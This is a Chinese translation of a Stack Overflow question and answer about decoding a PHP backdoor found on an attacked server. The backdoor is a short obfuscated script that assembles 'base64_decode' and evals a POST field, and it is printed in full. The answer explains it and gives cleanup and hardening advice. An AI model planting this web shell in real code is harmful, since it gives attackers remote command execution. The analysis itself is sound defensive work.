php – 尝试解码病毒

我的服务器最近遭到攻击,我一直在努力研究如何以及为什么发生这种情况。

我发现一个非常类似的病毒文件模式看起来像这样 – 据我可以告诉它试图运行一个特定的文件?

有没有人看到这样的东西,我该怎么解释呢?是只是基于$ sF字符串抓住个人字符?

<?php

$sF = "PCT4BA6ODSE_";
$s21 = strtolower($sF[4] . $sF[5] . $sF[9] . $sF[10] . $sF[6] . $sF[3] . $sF[11] . $sF[8] . $sF[10] . $sF[1] . $sF[7] . $sF[8] . $sF[10]);
$s22 = ${strtoupper($sF[11] . $sF[0] . $sF[7] . $sF[9] . $sF[2])}['nd335c3'];
if (isset($s22)) {
  eval($s21($s22));
}?>
变量$ s21等于base64_decode,$ s22等于$ _POST [‘nd335c3’]。

每当向服务器发出POST请求时,它将执行$ _POST [‘nd335c3’]中的任何命令;正如你所料,这是非常危险的。

我非常怀疑你的服务器被黑客入侵,但是您的网站脚本被利用。您的网站上有哪些用户可以上传文件?我已经看到很多这样的东西,WordPress与编码不好的插件。

解决问题

要解决此问题,请先删除此文件或代码段。您可能需要关闭您的站点并将其置于维护模式,直到您可以搜索并验证所有其他文件未被修改为止。

一旦站点备份并运行,请记录对被黑客文件所在位置的请求或包含相同POST变量的请求。

一旦你有一个用户发送数据到漏洞利用,你可以检查所有其他的日志文件,并将它们与相同的IP地址和用户代理进行比较。这是一个远射,但希望他们只使用一台电脑进行攻击。从日志中,您可以看到他们访问的是什么,以便可能执行攻击并上传被破坏的文件。

预防未来

>不要在您的网站上安装任何您在网上找到的代码,除非您信任开发人员,并相信它是完全安全的,并且知道他们发布更新。
>将您的Web服务器设置为除了上传目录和/ tmp之外没有写入权限
>验证所有上传的文件,以确保它们完全符合您的期望。
>不要让PHP运行上传文件的位置,将文件下载为静态直接文件。这样一来,如果上传的文件绕过文件检查,它仍然不会造成任何伤害。

http://stackoverflow.com/questions/29321907/trying-to-decode-a-virus

本站文章除注明转载外,均为本站原创或编译
转载请明显位置注明出处:php – 尝试解码病毒